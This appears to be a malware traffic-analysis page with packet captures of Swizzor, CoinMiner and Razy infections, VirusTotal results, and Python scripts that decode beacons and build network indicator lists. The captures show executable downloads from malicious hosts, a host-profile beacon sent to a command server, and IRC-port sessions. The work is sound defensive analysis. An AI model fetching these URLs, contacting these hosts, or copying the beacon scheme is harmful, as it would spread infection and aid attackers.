E..dy.@……..f…p…S*.]..s{.P…H……8.SMBu…………………….0….8………….IPC….
2017-07-03 15:43:30.718820 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 964:1086, ack 800, win 253, length 122 NBT Session Packet: Session Message
E…y.@….l…f…p…S*.^..s|2P…t<…..v.SMB%…………………H…@.
..6…..8…6.@…..?……….DESKTOP-H25VU4V.
…..4…blahhost-PC……..
…..5…..
2017-07-03 15:43:30.721043 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 1086:1189, ack 922, win 253, length 103 NBT Session Packet: Session Message
E…y.@….~…f…p…S*.^..s|.P……….c.SMB%…………………H…P.
..#…..8…#.@…..,……….WORKGROUP……..
……..blahhost-PC.
2017-07-03 15:43:31.699415 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 26, win 260, length 0
E..(Q.@……..f..:    ……H.I..$P….t……..
2017-07-03 15:43:36.711794 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 31, win 260, length 0
E..(Q.@……..f..:    ……H.I..)P….o……..
2017-07-03 15:43:41.376732 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 1189:1228, ack 961, win 253, length 39 NBT Session Packet: Session Message
E..Oy.@……..f…p…S*.^..s|.P…s……#.SMBq…………………….`….
2017-07-03 15:43:41.378025 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 1228:1271, ack 1004, win 253, length 43 NBT Session Packet: Session Message
E..Sy.@……..f…p…S*._%.s|.P…Y……’.SMBt………………..-….p….’…
2017-07-03 15:43:41.381702 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [F.], seq 1271, ack 1005, win 253, length 0
E..(y.@……..f…p…S*._P.s|.P….}……..
2017-07-03 15:43:41.724493 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 36, win 260, length 0
E..(Q.@……..f..:    ……H.I…P….j……..
2017-07-03 15:43:46.736953 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 41, win 260, length 0
E..(Q.@……..f..:    ……H.I..3P….e……..
2017-07-03 15:43:51.365090 IP 192.168.1.102.55851 > 75.75.75.75.53: 55467+ A? win10.ipv6.microsoft.com. (42)
E..FcQ….~….fKKKK.+.5.2……………win10.ipv6    microsoft.com…..
2017-07-03 15:43:51.727215 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 46, win 260, length 0
E..(Q.@……..f..:    ……H.I..8P….`……..
2017-07-03 15:43:56.740004 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 51, win 260, length 0
E..(Q @……..f..:    ……H.I..=P….[……..
2017-07-03 15:44:01.752644 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 56, win 260, length 0
E..(Q!@……..f..:    ……H.I..BP….V……..
2017-07-03 15:44:06.765073 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 61, win 260, length 0
E..(Q”@……..f..:    ……H.I..GP….Q……..
2017-07-03 15:44:08.152155 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [.], ack 10057, win 256, length 0
E..(“.@…8….f_.}….P.1..6.-.P………….
2017-07-03 15:44:11.780588 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 66, win 260, length 0
E..(Q#@……..f..:    ……H.I..LP….L……..
2017-07-03 15:44:16.793072 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 71, win 260, length 0
E..(Q$@……..f..:    ……H.I..QP….G……..
2017-07-03 15:44:21.805533 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 76, win 260, length 0
E..(Q%@……..f..:    ……H.I..VP….B……..
2017-07-03 15:44:26.802501 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 81, win 259, length 0
E..(Q&@……..f..:    ……H.I..[P….>……..
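Three things in the Swizzor trace above are worth pulling out programmatically: the /checkip/ request to ip-score.com carrying the bare User-Agent "AutoIt", the 86-byte pipe-delimited host profile sent to 213.183.58.9:1981 (sent twice with the same seq 0:86, so the second copy is a retransmission), and the steady run of pure ACKs from the victim toward that port, each acknowledging 5 more bytes roughly every 5 seconds, which is the server side of a keepalive. The SMB/NBT exchange with 192.168.1.112 in the middle of the trace is an inbound session from another LAN host (the victim answers on port 139 with a SYN-ACK) and is not part of the beacon channel. The Python below is an added example written for this page, not code from the original post or from the malware; it runs over lines copied from the capture, and the beacon field labels (country, id, external_ip, hostname, os, arch, version, screen, channel) are assumptions inferred from the observed values rather than anything the sample documents.

```python
"""Decode the pipe-delimited Swizzor beacon sent to 213.183.58.9:1981 and pull
the host-side tells out of tcpdump -A text.  Added example for this page, not
code from the original post; beacon field labels are assumptions."""
import ipaddress
import re
from datetime import datetime

# Constructed sample: lines copied from the capture above, with non-printable
# payload bytes shown as '.' the way tcpdump -A prints them.
SAMPLE = """\
2017-07-03 15:43:02.740348 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [P.], seq 0:66, ack 1, win 256, length 66: HTTP: GET /checkip/ HTTP/1.1
E..j".@...7....f_.}....P.1..6..oP...{...GET /checkip/ HTTP/1.1
User-Agent: AutoIt
Host: ip-score.com

2017-07-03 15:43:07.065901 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [P.], seq 0:86, ack 1, win 260, length 86
E..~Q.@........f..:    ......H.I...P.......United States|TTTTT3|76.111.8.85|blahhost|WIN_7|X86|No|No|1.0.1|ddd|Pr1080X21920X3|x|beta
2017-07-03 15:43:07.274722 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [P.], seq 0:86, ack 1, win 260, length 86
E..~Q.@........f..:    ......H.I...P.......United States|TTTTT3|76.111.8.85|blahhost|WIN_7|X86|No|No|1.0.1|ddd|Pr1080X21920X3|x|beta
2017-07-03 15:43:11.664823 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 6, win 260, length 0
2017-07-03 15:43:16.661934 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 11, win 260, length 0
2017-07-03 15:43:21.674695 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 16, win 260, length 0
2017-07-03 15:43:26.686897 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 21, win 260, length 0
"""

# tcpdump packet summary: timestamp, src.port > dst.port, TCP flags
HDR_RE = re.compile(r"^(\S+ \S+) IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags \[([^\]]+)\]")
ACK_RE = re.compile(r"\back (\d+)")
# A word-initial run of text carrying at least eight '|' separators up to end of line.
BEACON_RE = re.compile(r"[A-Za-z][A-Za-z ]*(?:\|[^|]*){8,}$")

# Assumed labels for the 13 slots observed; unknown slots keep positional names.
BEACON_FIELDS = ["country", "id", "external_ip", "hostname", "os", "arch",
                 "flag1", "flag2", "version", "field9", "screen", "field11", "channel"]


def is_ipv4(s):
    try:
        return ipaddress.ip_address(s).version == 4
    except ValueError:
        return False


def parse_beacon(payload):
    """Split on '|' and label the slots; slot 3 must hold an IPv4 address."""
    parts = payload.split("|")
    if len(parts) != len(BEACON_FIELDS):
        raise ValueError(f"expected {len(BEACON_FIELDS)} fields, got {len(parts)}")
    rec = dict(zip(BEACON_FIELDS, parts))
    if not is_ipv4(rec["external_ip"]):
        raise ValueError(f"slot 3 is not an IPv4 address: {rec['external_ip']!r}")
    return rec


def looks_like_beacon(text):
    """Return the beacon string found in a payload line, or None."""
    m = BEACON_RE.search(text)
    if m and any(is_ipv4(f) for f in m.group(0).split("|")):
        return m.group(0)
    return None


def extract_indicators(text):
    """Pair each payload line with its packet header and record the AutoIt
    User-Agent and the profile beacon; retransmitted copies are collapsed."""
    found, seen, hdr = [], set(), None
    for line in text.splitlines():
        m = HDR_RE.match(line)
        if m:
            hdr = m
            continue
        if hdr is None:
            continue
        dst = f"{hdr.group(4)}:{hdr.group(5)}"
        item = None
        if line.startswith("User-Agent: AutoIt"):
            item = {"kind": "autoit_ua", "dst": dst, "payload": line}
        elif (b := looks_like_beacon(line)):
            item = {"kind": "beacon", "dst": dst, "payload": b}
        if item and (item["kind"], dst, item["payload"]) not in seen:
            seen.add((item["kind"], dst, item["payload"]))
            found.append(item)
    return found


def heartbeat_intervals(text, dst):
    """From the client's pure ACKs toward dst, return how many bytes the server
    sent between consecutive ACKs and how many seconds apart they were."""
    points = []
    for line in text.splitlines():
        m = HDR_RE.match(line)
        if not m or f"{m.group(4)}:{m.group(5)}" != dst or m.group(6) != ".":
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
        points.append((ts, int(ACK_RE.search(line).group(1))))
    pairs = list(zip(points, points[1:]))
    byte_deltas = [b[1] - a[1] for a, b in pairs]
    sec_deltas = [round((b[0] - a[0]).total_seconds(), 1) for a, b in pairs]
    return byte_deltas, sec_deltas
```

Two details from the decoded beacon are useful pivots. The third slot is a public IPv4 address that differs from the victim's LAN address 192.168.1.102, consistent with the ip-score.com lookup made a few seconds earlier, and the hostname slot matches the NetBIOS/LLMNR name blahhost-PC the host announces on the LAN. For a network signature, the AutoIt User-Agent on a /checkip/ request and a 13-field pipe string containing an IPv4 address sent to a high port are the two cheapest matches; the 5-byte, 5-second server heartbeat returned by heartbeat_intervals is what a beaconing detector would key on once the session is up.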

 

CoinMiner app.exe Malware IRC Backdoor Trojan Botnet PCAP File Download Traffic Analysis Sample

SHA256: 8d670eaeecbe0d8bc172560646b86d729b2c80b2f536cd2024a8ae502d89c805
File name: app.exe
Detection ratio: 44 / 61
Analysis date: 2017-07-03 22:06:14 UTC ( 0 minutes ago )

Ikarus Trojan.MSIL.CoinMiner 20170703
K7AntiVirus Trojan ( 005104711 ) 20170703
K7GW Trojan ( 005104711 ) 20170703
Kaspersky Trojan.Win32.CoinMiner.qtq 20170703
Malwarebytes Backdoor.Bot 20170703
McAfee RDN/Generic.grp 20170703
McAfee-GW-Edition RDN/Generic.grp 20170703
Microsoft Trojan:Win32/Skeeyah.A!bit 20170703
eScan Gen:Variant.MSILPerseus.107893 20170703
NANO-Antivirus Trojan.Win32.CoinMiner.eqojuk 20170703
Palo Alto Networks (Known Signatures) generic.ml 20170703
Panda Trj/CI.A 20170703
Rising Trojan.CoinMiner!8.30A (cloud:bDpaAd9U5ZE) 20170703
SentinelOne (Static ML) static engine – malicious 20170516
Sophos Mal/Generic-S 20170703
Symantec Trojan.Gen.2 20170703
Tencent Win32.Trojan.Coinminer.Pegd 20170703
TrendMicro TROJ_GEN.R0E9C0PG317 20170703
TrendMicro-HouseCall TROJ_GEN.R0E9C0PG317 20170703
VIPRE Trojan.Win32.Generic!BT 20170703

https://virustotal.com/en/file/8d670eaeecbe0d8bc172560646b86d729b2c80b2f536cd2024a8ae502d89c805/analysis/1499119574/

2017-07-03 15:39:29.122784 IP 192.168.1.102.60543 > 87.236.19.98.80: Flags [P.], seq 0:408, ack 1, win 64240, length 408: HTTP: GET /holyson/app.exe HTTP/1.1
E….j@….q…fW..b…P.c……P…….GET /holyson/app.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gatsoed9.beget.tech
Connection: Keep-Alive

2017-07-03 15:39:37.174504 IP 192.168.1.102.51863 > 75.75.75.75.53: 20019+ A? iplogger.com. (30)
E..:c2….~….fKKKK…5.&..N3………..iplogger.com…..
2017-07-03 15:39:37.175522 IP 192.168.1.102.51864 > 75.75.75.75.53: 33057+ A? gatsoed9.beget.tech. (37)
E..Ac3….~….fKKKK…5.-…!………..gatsoed9.beget.tech…..
2017-07-03 15:39:37.485660 IP 192.168.1.102.60544 > 87.236.19.98.80: Flags [S], seq 808192539, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.s@……..fW..b…P0,
……. ……………..
2017-07-03 15:39:37.643513 IP 192.168.1.102.60544 > 87.236.19.98.80: Flags [.], ack 4015261327, win 64240, length 0
E..(.t@……..fW..b…P0,
..T..P…j………
2017-07-03 15:39:37.646816 IP 192.168.1.102.60544 > 87.236.19.98.80: Flags [P.], seq 0:80, ack 1, win 64240, length 80: HTTP: GET /AudioHD.exe HTTP/1.1
E..x.u@……..fW..b…P0,
..T..P…….GET /AudioHD.exe HTTP/1.1
Host: gatsoed9.beget.tech
Connection: Keep-Alive

2017-07-03 15:40:40.051841 IP 192.168.1.102.60545 > 88.99.66.31.443: Flags [.], ack 6604, win 253, length 0
E..(..@….?…fXcB…..|….<..P…h………
2017-07-03 15:40:54.728442 IP 192.168.1.102.60544 > 87.236.19.98.80: Flags [.], ack 1497873, win 64240, length 0
E..(.B@….1…fW..b…P0,
l.j..P………….
2017-07-03 15:40:56.480813 IP 192.168.1.102.60533 > 212.129.46.191.6666: Flags [.], ack 2319946782, win 252, length 0
E..(..@…0….f…..u.

Razy Trojan Malware oylau2003.ddns.net PCAP File Download Traffic Analysis Sample

SHA256: 5e123d4f7b03118196a1f27cfa5a56a3ca8723c3d0e5b02d3719459ab303221b
File name: 7c8701febd.exe
Detection ratio: 42 / 61
Analysis date: 2017-07-03 22:01:16 UTC ( 0 minutes ago )
Ad-Aware Gen:Variant.Razy.6869 20170703
AegisLab Troj.W32.Gen.mein 20170703
AhnLab-V3 Trojan/Win32.Agent.R202451 20170703
ALYac Gen:Variant.Razy.6869 20170703
Arcabit Trojan.Razy.D1AD5 20170703
Avast Win32:Evo-gen [Susp] 20170703
AVG Win32:Evo-gen [Susp] 20170703
Avira (no cloud) TR/Dropper.Gen 20170703
AVware Trojan.Win32.Generic!BT 20170703
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170703
BitDefender Gen:Variant.Razy.6869 20170703

2017-07-03 15:25:01.264665 IP 192.168.1.102.60223 > 107.154.161.190.80: Flags [P.], seq 0:410, ack 1, win 256, length 410: HTTP: GET /download/7c8701febd.exe HTTP/1.1
E…LY@….u…fk….?.PV..ax…P…S3..GET /download/7c8701febd.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: directlink.cz
Connection: Keep-Alive

2017-07-03 15:26:42.312240 IP 192.168.1.102.60499 > 75.75.75.75.53: 51646+ A? oylau2003.ddns.net. (36)
E..@b……….fKKKK.S.5.,…………..        oylau2003.ddns.net…..
2017-07-03 15:26:42.332629 IP 192.168.1.102.60253 > 103.68.223.134.3232: Flags [S], seq 123003361, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4!.@….B…fgD…]…T…….. .e……………
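Across the CoinMiner and Razy traces the indicators a responder wants in hand are the resolved names (iplogger.com, gatsoed9.beget.tech, oylau2003.ddns.net), the two executables fetched from gatsoed9.beget.tech (/holyson/app.exe and then /AudioHD.exe over a fresh connection), the established session to 212.129.46.191 on port 6666 (the port the page's title attributes to IRC) and the Razy sample's SYN to 103.68.223.134:3232 immediately after the dynamic-DNS lookup. The Python below is an added example, not the page's own tooling: it builds that inventory from tcpdump -A lines copied from both sections and annotates IRC-range ports, non-standard ports and dynamic-DNS names. The port range and the suffix list are assumptions used for annotation, not something the captures themselves state.

```python
"""Build an indicator inventory (DNS names, request URLs, outbound host:port
pairs) from tcpdump -A text and annotate the suspicious ones.

Added example for this page, not code from the original post.  The sample
lines are copied from the CoinMiner and Razy captures above; the IRC port
range and the dynamic-DNS suffix list are assumptions used for annotation.
"""
import re

# Constructed sample: tcpdump lines from the two captures (payload bytes as '.').
SAMPLE = """\
2017-07-03 15:39:29.122784 IP 192.168.1.102.60543 > 87.236.19.98.80: Flags [P.], seq 0:408, ack 1, win 64240, length 408: HTTP: GET /holyson/app.exe HTTP/1.1
E....j@....q...fW..b...P.c......P.......GET /holyson/app.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Host: gatsoed9.beget.tech
Connection: Keep-Alive

2017-07-03 15:39:37.174504 IP 192.168.1.102.51863 > 75.75.75.75.53: 20019+ A? iplogger.com. (30)
2017-07-03 15:39:37.175522 IP 192.168.1.102.51864 > 75.75.75.75.53: 33057+ A? gatsoed9.beget.tech. (37)
2017-07-03 15:39:37.485660 IP 192.168.1.102.60544 > 87.236.19.98.80: Flags [S], seq 808192539, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-07-03 15:39:37.646816 IP 192.168.1.102.60544 > 87.236.19.98.80: Flags [P.], seq 0:80, ack 1, win 64240, length 80: HTTP: GET /AudioHD.exe HTTP/1.1
E..x.u@........fW..b...P0,
..T..P.......GET /AudioHD.exe HTTP/1.1
Host: gatsoed9.beget.tech
Connection: Keep-Alive

2017-07-03 15:40:56.480813 IP 192.168.1.102.60533 > 212.129.46.191.6666: Flags [.], ack 2319946782, win 252, length 0
2017-07-03 15:26:42.312240 IP 192.168.1.102.60499 > 75.75.75.75.53: 51646+ A? oylau2003.ddns.net. (36)
2017-07-03 15:26:42.332629 IP 192.168.1.102.60253 > 103.68.223.134.3232: Flags [S], seq 123003361, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
"""

PKT_RE = re.compile(r"^\S+ \S+ IP (\S+)\.(\d+) > (\S+)\.(\d+): (.*)$")
DNS_RE = re.compile(r"\d+\+ A\? (\S+)\. \(\d+\)")        # "20019+ A? iplogger.com. (30)"
HTTP_RE = re.compile(r"(GET|POST) (\S+) HTTP/1\.[01]$")    # tcpdump's "HTTP: GET /x HTTP/1.1" summary
HOST_RE = re.compile(r"^Host: (\S+)$")

IRC_PORTS = range(6660, 6670)                                # assumption: conventional IRC port range
DDNS_SUFFIXES = (".ddns.net", ".no-ip.org", ".duckdns.org")  # assumption: common dynamic-DNS providers


def _add(lst, value):
    """Append value once, keeping first-seen order."""
    if value not in lst:
        lst.append(value)


def build_inventory(text):
    """Walk tcpdump -A lines; collect A? queries, outbound dst:port pairs, and
    reconstruct request URLs by joining the summary's path with the Host header."""
    inv = {"dns": [], "urls": [], "connections": []}
    pending = None  # (method, path) of a request still waiting for its Host header
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            _src, _sport, dst, dport, rest = m.groups()
            pending = None
            d = DNS_RE.search(rest)
            if d:
                _add(inv["dns"], d.group(1))
                continue
            if dport == "53":
                continue
            _add(inv["connections"], f"{dst}:{dport}")
            h = HTTP_RE.search(rest)
            if h:
                pending = (h.group(1), h.group(2))
            continue
        hm = HOST_RE.match(line)
        if hm and pending:
            _add(inv["urls"], f"http://{hm.group(1)}{pending[1]}")
            pending = None
    return inv


def annotate(inv):
    """Flag connections on IRC-range or non-web ports and dynamic-DNS names."""
    notes = []
    for conn in inv["connections"]:
        port = int(conn.rsplit(":", 1)[1])
        if port in IRC_PORTS:
            notes.append(f"{conn}: IRC-range port")
        elif port not in (80, 443):
            notes.append(f"{conn}: non-standard port")
    for name in inv["dns"]:
        if name.endswith(DDNS_SUFFIXES):
            notes.append(f"{name}: dynamic-DNS name")
    return notes


if __name__ == "__main__":
    inv = build_inventory(SAMPLE)
    for key, values in inv.items():
        print(key, values)
    print("\n".join(annotate(inv)))
```

The inventory keeps first-seen order, which makes a diff against a previous run straightforward, and the URL reconstruction deliberately uses tcpdump's own "HTTP: GET ..." summary rather than the payload bytes, so it still works when the request line is split across a ragged payload line as it is for /AudioHD.exe above.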